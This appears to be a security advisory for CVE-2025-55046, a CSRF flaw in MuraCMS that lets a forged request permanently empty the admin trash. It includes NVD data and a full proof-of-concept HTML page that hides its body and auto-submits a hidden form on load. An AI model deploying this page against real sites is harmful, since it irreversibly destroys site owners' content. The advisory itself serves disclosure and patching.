Security Vulnerability Report
CVE-2025-55046 CVSS 8.1 HIGH


Published: 2026-03-18 16:16:24
Last Modified: 2026-03-20 18:10:09

Description

MuraCMS through 10.1.10 contains a CSRF vulnerability that allows attackers to permanently destroy all deleted content stored in the trash system. The vulnerable cTrash.empty function lacks CSRF token validation, so a malicious website can forge a request that irreversibly deletes all trashed content when an authenticated administrator visits a crafted webpage. Successful exploitation results in potentially catastrophic data loss within the MuraCMS system: when an authenticated administrator visits a malicious page containing the CSRF exploit, their browser automatically submits a hidden form that permanently empties the entire trash without any validation, confirmation dialog, or user consent.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Exploitability Score: 2.8
Impact Score: 5.2
Weakness: CWE-352 (Cross-Site Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:* - VULNERABLE
MuraCMS < 10.1.14
MuraCMS <= 10.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for CVE-2025-55046: MuraCMS cTrash.empty CSRF -->
<!-- This PoC demonstrates how an attacker can permanently delete all trash content -->
<!DOCTYPE html>
<html>
<head>
  <title>Loading...</title>
  <style>body { display: none; }</style>
</head>
<body>
  <form id="csrfForm" action="https://target-site.com/admin/cTrash.empty" method="POST">
    <!-- MuraCMS cTrash.empty endpoint parameters -->
    <input type="hidden" name="method" value="empty" />
    <input type="hidden" name="siteid" value="default" />
    <input type="hidden" name="contentid" value="" />
  </form>
  <script>
    // Auto-submit the form when page loads
    document.getElementById('csrfForm').submit();
    // Optional: Redirect after exploitation
    setTimeout(function() {
      window.location.href = 'https://target-site.com/admin';
    }, 1000);
  </script>
</body>
</html>
<!-- Attack Scenario:
1. Attacker creates a malicious webpage with the CSRF PoC above
2. Attacker tricks an authenticated MuraCMS admin to visit the page
3. Admin's browser automatically sends POST request to cTrash.empty
4. Server executes empty operation without CSRF validation
5. All trashed content is permanently deleted

Required Conditions:
- Target must be running MuraCMS <= 10.1.10
- Admin must be logged in and have active session
- Admin must visit the attacker's malicious page
-->
```

References

https://docs.murasoftware.com/v10/release-notes/#section-version-1014 (Release Notes; the fix ships in 10.1.14)
https://www.murasoftware.com (Product)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-55046", "sourceIdentifier": "[email protected]", "published": "2026-03-18T16:16:23.790", "lastModified": "2026-03-20T18:10:09.260", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MuraCMS through 10.1.10 contains a CSRF vulnerability that allows attackers to permanently destroy all deleted content stored in the trash system through a simple CSRF attack. The vulnerable cTrash.empty function lacks CSRF token validation, enabling malicious websites to forge requests that irreversibly delete all trashed content when an authenticated administrator visits a crated webpage. Successful exploitation of the CSRF vulnerability results in potentially catastrophic data loss within the MuraCMS system. When an authenticated administrator visits a malicious page containing the CSRF exploit, their browser automatically submits a hidden form that permanently empties the entire trash system without any validation, confirmation dialog, or user consent."}, {"lang": "es", "value": "MuraCMS hasta la versión 10.1.10 contiene una vulnerabilidad CSRF que permite a los atacantes destruir permanentemente todo el contenido eliminado almacenado en el sistema de papelera a través de un simple ataque CSRF. La función vulnerable cTrash.empty carece de validación de token CSRF, lo que permite a sitios web maliciosos forjar solicitudes que eliminan irreversiblemente todo el contenido en la papelera cuando un administrador autenticado visita una página web creada. La explotación exitosa de la vulnerabilidad CSRF resulta en una pérdida de datos potencialmente catastrófica dentro del sistema MuraCMS. Cuando un administrador autenticado visita una página maliciosa que contiene el exploit CSRF, su navegador envía automáticamente un formulario oculto que vacía permanentemente todo el sistema de papelera sin ninguna validación, diálogo de confirmación o consentimiento del usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:murasoftware:mura_cms:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB4646EE-1255-4B42-890A-E0B57EBFE2CE"}]}]}], "references": [{"url": "https://docs.murasoftware.com/v10/release-notes/#section-version-1014", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.murasoftware.com", "source": "[email protected]", "tags": ["Product"]}]}}
```